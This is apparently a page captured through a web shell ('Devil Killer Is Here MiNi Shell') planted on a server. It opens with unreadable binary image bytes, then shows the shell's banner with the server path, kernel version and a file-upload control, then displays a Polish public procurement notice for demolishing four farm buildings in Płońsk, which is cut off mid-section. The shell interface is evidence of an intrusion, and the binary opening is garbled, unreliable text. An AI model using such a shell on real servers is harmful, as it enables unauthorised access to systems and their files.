JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210913/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210913/0017870502-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Wykonanie robót rozbiórkowych 4 budynków położonych na działce nr ew. 195/21, miasto Płońsk, gmina Płońsk, powiat płoński, województwo mazowieckie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Krajowy Ośrodek Wsparcia Rolnictwa</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Oddział Terenowy w Warszawie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 367849538</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Plac Bankowy 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">00-095</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia.publiczne.warszawa@kowr.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">bip.kowr.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - agencja wykonawcza</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Realizacja zadań wynikających z polityki państwa, w szczególności w zakresie wdrażania i stosowania instrumentów wsparcia rolnictwa, aktywnej polityki rolnej oraz rozwoju obszarów wiejskich </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie robót rozbiórkowych 4 budynków położonych na działce nr ew. 195/21, miasto Płońsk, gmina Płońsk, powiat płoński, województwo mazowieckie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-4c12a31b-1084-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00178705</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">02</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-09-13</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00009565/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.16 Wykonanie robót rozbiórkowych 4 obiektów budowlanych, położonych na działce nr ew. 195/21, miasto Płońsk, gmina Płońsk, powiat płoński, województwo mazowieckie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://kowr.eb2b.com.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja między Zamawiający<br/>ma Wykonawcami odbywa się w formie elektronicznej, wyłącznie za pośrednictwem Platformy<br/>Zakupowej eB2B zwanej dalej „Platformą”, pod adresem: https://kowr.eb2b.com.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.Zamawiający nie przewiduje sposobu komunikowania się z Wykonawcami w inny sposób niż przy<br/>użyciu środków komunikacji elektronicznej wskazanych w SWZ.<br/>2. Podgląd i pobieranie dokumentacji Zamawiającego na Platformie nie wymaga logowania. Natomiast<br/>w celu przystąpienia do postępowania, nowi użytkownicy powinni dokonać bezpłatnej rejestracji, a w<br/>przypadku posiadania konta - logowania.<br/>3. Komunikacja między Zamawiającym, a Wykonawcami odbywa się wyłącznie przy użyciu Platformy,z<br/>użyciem zakładki „Pytania / Informacje”. Dokumenty przekazywane w inny sposób mogą zostać uznane<br/>jako przekazane po terminie lub nieprzekazane.<br/>4. Wymagania techniczne i organizacyjne korzystania z Platformy określa regulamin dostępny pod<br/>adresem https://platforma.eb2b.com.pl/user/terms.<br/>5. Zamawiający określa następujące niezbędne wymagania sprzętowo - aplikacyjne umożliwiające<br/>pracę na Platformie: 1) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż<br/>4/1 mb/s,2) komputer klasy PC lub lub Mac, o następującej konfiguracji: pamięć RAM min. 8 GB,<br/>procesor Intel IV 4GHz, jeden z systemów operacyjnych: MS Windows 7, Mac OS x 10.4, Linux, lub ich<br/>nowsze wersje, 3) zainstalowana dowolna najnowsza wersja przeglądarki internetowej; w przypadku<br/>Internet Explorer minimalnie wersja 11.0,4) włączona obsługa JavaScript,5) zainstalowany program<br/>obsługujący stosowane przez wykonawcę formaty plików (np. Acrobat Reader dla plików w formacie .pdf).<br/>6. Maksymalny rozmiar plików przekazywanych za pośrednictwem Platformy wynosi 50<br/>MB.Zamawiający preferuje następujące formaty przesyłanych danych: .doc, .docx, .rtf oraz .pdf.<br/>Natomiast Wykonawca może posługiwać się innymi formatami określonym w katalogu formatów<br/>wskazanych w załączniku nr 2 do rozporządzenia Rady Ministrów z dnia 12 kwietnia 2012 r. w sprawie<br/>Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany<br/>informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych<br/>(Dz.U. z 2017 r.poz. 2247).<br/>7. Oferta powinna zostać sporządzona w języku polskim.<br/>8. Oferta musi być opatrzona podpisem kwalifikowanym, podpisem zaufanym lub podpisem osobistym.<br/>9. Dopuszczalne formaty podpisu kwalifikowanego określone zostały w załączniku nr 2 do<br/>rozporządzenia Rady Ministrów z dnia 12 kwietnia 2012 r. w sprawie Krajowych Ram<br/>Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci<br/>elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych (Dz.U.z 2017 r. poz.<br/>2247).<br/>10. Dopuszczalne rozszerzenia plików podpisywanych podpisem zaufanym: .txt, .rtf, .pdf, .xps,<br/>.odt,.ods, .odp, .doc, .xls, .ppt, .docx, .xlsx, .pptx, .csv, .jpg, .jpeg, .tif, .tiff, .geotiff, .png, .svg, .wav,<br/>.mp3,.avi, .mpg, .mpeg, .mp4, .m4a, .mpeg4, .ogg, .ogv, .zip, .tar, .gz, .gzip, .7Z, .html, .xhtml, .css,<br/>.xml,.xsd, .gml, .rng, .xsl, .xslt, .TSL, .dwg, .dwf, .dxf, .dgn, .jp2, natomiast maksymalny rozmiar<br/>podpisywanego pliku wynosi 10 MB, szczegółowe informacje zawarte są na<br/>stroniehttps://obywatel.gov.pl/praca-i-biznes/podpisz-dokument-elektronicznie-wykorzystaj-podpiszaufany/.<br/>11. Wykonawca może przed upływem terminu do składania oferty zmienić lub wycofać ofertę zgodnie z<br/>funkcjonalnością Platformy.<br/>12. Przekazywane w postępowaniu dokumenty zawierające tajemnicę przedsiębiorstwa należy składać<br/>w osobnym pliku wraz z jednoczesnym zaznaczeniem polecenia „Załącznik stanowiący tajemnicę<br/>przedsiębiorstwa”.<br/>13. Szczegółowe informacje nt. ww. wymogu zawarto w Specyfikacji Warunków Zamówienia</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Informacja o przetwarzaniu danych osobowych:<br/>Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27<br/>kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i<br/>w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne<br/>rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej jako „RODO”,<br/>wszystkie osoby, które ubiegają się o udzielenie zamówienia/ złożyły ofertę. Zamawiający informuje,<br/>że:<br/>1. Administrator danych osobowych<br/>Administratorem, czyli podmiotem decydującym o celach i środkach przetwarzania Pani/Pana danych<br/>osobowych, jest Krajowy Ośrodek Wsparcia Rolnictwa (zwany dalej KOWR) z siedzibą w Warszawie<br/>(01-207) przy ul. Karolkowej 30. Z administratorem może się Pani/Pan skontaktować poprzez adres email:<br/>kontakt@kowr.gov.pl lub pisemnie na adres korespondencyjny: Krajowy Ośrodek Wsparcia<br/>Rolnictwa, ul. Karolkowa 30, 01-207 Warszawa.<br/>2. Inspektor Ochrony Danych Osobowych<br/>W KOWR wyznaczono Inspektora Ochrony Danych Osobowych, z którym może się Pani/Pan<br/>skontaktować w sprawach ochrony i przetwarzania swoich danych osobowych pod adresem e-mail:<br/>iodo@kowr.gov.pl lub pisemnie na adres naszej siedziby, wskazany w ust. 1.<br/>3. Cele i podstawy prawne przetwarzania danych osobowych<br/>Pani/Pana dane osobowe przetwarzane będą w celach związanym z postępowaniem o udzielenie zamówienia publicznego prowadzonym na podstawie ustawy z dnia 11 września 2019 r. Prawo<br/>zamówień publicznych – t.j. Dz. U. z 2021 poz. 1129 ze zm. (dalej PZP), w celach związanych z<br/>realizacją obowiązków administratora jako Zamawiającego, które wynikają z obowiązujących<br/>przepisów prawa. Pani/Pana dane osobowe przetwarzane będą także w celu realizacji obowiązku<br/>prowadzenia ewidencji korespondencji i archiwizacji dokumentacji zgodnie z ustawą z dnia 14 lipca<br/>1983 r. o narodowym zasobie archiwalnym i archiwach (Dz. U. z 2020 r. poz. 164 z późn. zm.).<br/>4. Odbiorcy danych osobowych<br/>Pani/Pana dane pozyskane w związku z postępowaniem o udzielenie zamówienia publicznego<br/>przekazywane będą wszystkim zainteresowanym podmiotom i osobom, gdyż co do zasady<br/>postępowanie o udzielenie zamówienia publicznego jest jawne.<br/>Ograniczenie dostępu do Pani/Pana danych, o których mowa wyżej może wystąpić jedynie w<br/>szczególnych przypadkach, jeśli jest to uzasadnione ochroną prywatności, zgodnie z art. 18 ust 5 pkt 1<br/>i 2 PZP.<br/>Pani/Pana dane osobowe mogą być udostępniane innym osobom lub podmiotom jeżeli obowiązek taki<br/>będzie wynikać z przepisów prawa. Do Pani/Pana danych mogą też mieć dostęp podmioty<br/>przetwarzające dane w naszym imieniu, np. podmioty świadczące pomoc prawną, usługi<br/>informatyczne, usługi niszczenia dokumentów, jak również inni administratorzy danych osobowych<br/>przetwarzający dane we własnym imieniu, np. podmioty prowadzące działalność pocztową lub<br/>kurierską.<br/>5. Okres przetwarzania danych osobowych<br/>Pani/Pana dane osobowe będą przetwarzane przez okres przewidziany przepisami prawa w tym<br/>zakresie, w tym przez okres przechowywania dokumentacji określony w przepisach powszechnych i<br/>uregulowaniach wewnętrznych KOWR w zakresie archiwizacji dokumentów, okres przedawnienia<br/>roszczeń przysługujących KOWR i w stosunku do niego.<br/>Dokumentacja dotycząca postępowania o udzielenie zamówienia publicznego będzie przechowywana,<br/>zgodnie z art. 78 ust. 1 PZP, przez okres 4 lat od dnia zakończenia postępowania o udzielenie<br/>zamówienia, licząc od dnia 1 stycznia roku następnego po dniu zakończenia postępowania, a jeżeli<br/>czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy.<br/>Dalsze informacje dotyczące RODO zawarto w Sekcji IX niniejszego ogłoszenia.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">WAR.WOP.260.2.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 872439,16 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest wykonanie robót rozbiórkowych czterech budynków położonych <br/>na działce nr ew. 195/21, miasto Płońsk, gmina Płońsk, powiat płoński, województwo mazowieckie:<br/>1)	Budynek gospodarczy 1 – budynek gospodarczy cielętnik – chlew macior – nr inw. 0039<br/>2)	Budynek gospodarczy 2 – budynek gospodarczy chlewnia macior – nr inw. 0068<br/>3)	Budynek gospodarczy 3 – budynek gospodarczy wychowalnia knurów – nr inw. 0069<br/>4)	Budynek gospodarczy 4 – budynek gospodarczy wychowalnia loszek – nr inw. 070/182<br/>2. Kody i nazwy przedmiotu zamówienia według Wspólnego Słownika Zamówienia: <br/>1)	45.11.00.00-1 – Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty <br/> ziemne,<br/>2)	45.11.10.00-8 – Roboty w zakresie burzenia, roboty ziemne,<br/>3)	45.11.12.20-6 – Roboty w zakresie usuwania gruzu,<br/>4)	45.11.12.13-4 – Roboty w zakresie oczyszczania terenu.<br/>3.	Zakres robót rozbiórkowych obejmuje:<br/>1)	całkowitą rozbiórkę obiektów wraz z fundamentami i innymi elementami będącymi częściami składowymi,<br/>2)	oczyszczenie terenu z gruzu i innych pozostałości porozbiórkowych w sposób zgodny z obowiązującymi przepisami, <br/>3)	plantowanie do poziomu terenu otaczającego i uporządkowanie terenu, <br/>4)	wywiezienie oraz utylizację materiałów pochodzących z rozbiórki.<br/>4.	Przedmiot zamówienia należy wykonać w sposób zgodny z obowiązującymi normami i przepisami prawa, w szczególności:<br/>a)	Ustawą z dnia 7 lipca 1994r. Prawo budowlane (Dz. U z 2020r. poz. 1333 ze zm.),<br/>b)	Ustawą z dnia 14 grudnia 2012r. o odpadach (Dz. U. z 2021r. poz. 779 ze zm.),<br/>c)	Ustawą z dnia 19 czerwca 1997r. o zakazie stosowania wyrobów zawierających azbest (Dz. U. z 2020r. poz. 1680), <br/>d)	Ustawa z dnia 19 sierpnia 2011r. o przewozie towarów niebezpiecznych (Dz.U. <br/>z 2021r. poz. 756 z późn. zmianami),<br/>e)	Rozporządzeniem Ministra Pracy i Polityki Socjalnej z dnia 26 września 1997r. <br/>w sprawie ogólnych przepisów bezpieczeństwa i higieny pracy (tekst jednolity Dz. U. <br/>z 2003r. Nr 169, poz. 1650, z późn. zmianami),<br/>f)	Rozporządzeniem Ministra Infrastruktury z dnia 6 lutego 2003r. w sprawie bezpieczeństwa i higieny pracy podczas wykonywania robót budowlanych (Dz. U. Nr 47, poz. 401),<br/>g)	Rozporządzeniem Ministra Gospodarki i Pracy z dnia 14 października 2005r. w sprawie zasad bezpieczeństwa i higieny pracy przy zabezpieczaniu i usuwaniu wyrobów zawierających azbest oraz programu szkolenia w zakresie bezpiecznego użytkowania takich wyrobów (Dz. U. z 2005r. Nr 216, poz. 1824), <br/>h)	Rozporządzeniem Ministra Gospodarki, Pracy i Polityki Społecznej z dnia 2 kwietnia 2004r. w sprawie sposobów i warunków bezpiecznego użytkowania i usuwania wyrobów zawierających azbest (Dz. U. z 2004r. nr 71 poz. 649).<br/>5.	Zakres robót rozbiórkowych obejmuje: <br/>a)	całkowitą rozbiórkę budynków i budowli wymienionych w punkcie 2 wraz <br/>z występującymi posadzkami i fundamentami,<br/>b)	uporządkowanie i oczyszczenie terenu z gruzu i innych pozostałości po rozbiórce <br/>w sposób zgodny z obowiązującymi przepisami, a w szczególności zgodnie z ustawą <br/>o odpadach – występują również odpady niebezpieczne zawierające azbest,<br/>c)	wywiezienie materiałów pochodzących z rozbiórki, <br/>d)	plantowanie do poziomu terenu otaczającego i uporządkowanie terenu, <br/>e)	dostarczenie w terminie nie dłuższym niż 40 dni od dnia podpisania protokołu końcowego robót powykonawczej inwentaryzacji geodezyjno-kartograficznej z naniesionymi zmianami po przeprowadzonej likwidacji obiektów, wraz z oświadczeniem uprawnionego geodety o uzyskaniu pozytywnego wyniku weryfikacji operatu technicznego we właściwym starostwie powiatowym. <br/>6.	Wykonanie rozbiórki należy wykonać według wydanych przez Starostwo Pozwoleń oraz załączonej dokumentacji budowlanej.<br/>7.	Dokumentacja budowlana składająca się z: Projektu Rozbiórki, Specyfikacji Technicznej Wykonania i Odbioru Robót Budowlanych, przedmiarów i wykazu materiałów z odzysku stanowi załącznik nr 7 do SWZ.<br/>8.	Załączone przedmiary robót należy traktować jako dokumenty informacyjne. Zamawiający zastrzega, że ewentualne różnice między zakresem i ilością robót określonych <br/>w przedmiarach robót, a zakresem i ilością robót rzeczywiście wykonanych nie będą skutkować zmianą ceny ryczałtowej (określonej w ofercie i zawartej umowie) za wykonanie zamówienia.<br/>9.	Zamawiający zaleca przeprowadzenie wizji lokalnej terenu i jego otoczenia w celu zdobycia wszelkich dodatkowych informacji, które mogą posłużyć do przygotowania oferty, zawarcia umowy i wykonania zamówienia. Koszty dokonania wizji lokalnej terenu ponosi Wykonawca.<br/>10.	Roboty związane z demontażem, opakowaniem oraz transportem azbestu powinny zostać przeprowadzone przez wyspecjalizowane podmioty posiadające wymagane w tym zakresie prawem dokumenty oraz posiadające wyposażenie techniczne i socjalne zapewniające prowadzenie prac oraz zabezpieczenie pracowników i środowiska przed narażeniem na działanie azbestu. Wyroby azbestowe muszą zostać przekazane na składowisko odpadów zajmujące się utylizacją odpadów niebezpiecznych. <br/>11.	Zamawiający stosownie do zapisów art. 95 ustawy Pzp, wymaga zatrudnienia przez wykonawcę lub podwykonawcę na podstawie umowy o pracę osób wykonujących wszelkie czynności wchodzące w tzw. koszty bezpośrednie na podstawie umowy o pracę <br/>w rozumieniu przepisów ustawy z dnia 26 czerwca 1974 r. - Kodeks pracy (Dz.U. z 2019 r., poz. 1040 ze zm. dalej jako ustawa Kodeks pracy). Wymóg ten dotyczy osób, które wykonują czynności bezpośrednio związane w wykonywaniem robót, czyli tzw. pracowników fizycznych. Wykaz czynności w zakresie realizacji zamówienia, które wykonywać winny osoby zatrudnione na podstawie umowy o pracę obejmuje: zabezpieczenie i uporządkowanie terenu oraz rozebranie obiektów, w szczególności: konstrukcji dachu, konstrukcji ścian, słupów, ogrodzeń, fundamentów. Wymóg ten nie dotyczy, między innymi osób: kierujących budową, dostawców materiałów budowlanych.<br/>12.	Wykonawca w ciągu 7 dni od dnia zawarcia umowy dostarczy Zamawiającemu wykaz pracowników fizycznych, o których mowa w pkt 11.<br/>13.	Dodatkowo dokładny opis przedmiotu zamówienia określono w proponowanych postanowieniach umowy, stanowiących załącznik nr 3 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45110000-1 - Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty ziemne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111000-8 - Roboty w zakresie burzenia, roboty ziemne</p> <p class="mb-0">45111213-4 - Roboty w zakresie oczyszczania terenu</p> <p class="mb-0">45111220-6 - Roboty w zakresie usuwania gruzu</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">100 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin wykonania robót</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zdolności technicznej lub zawodowej:<br/>a)	Potencjał kadrowy - Wykonawca 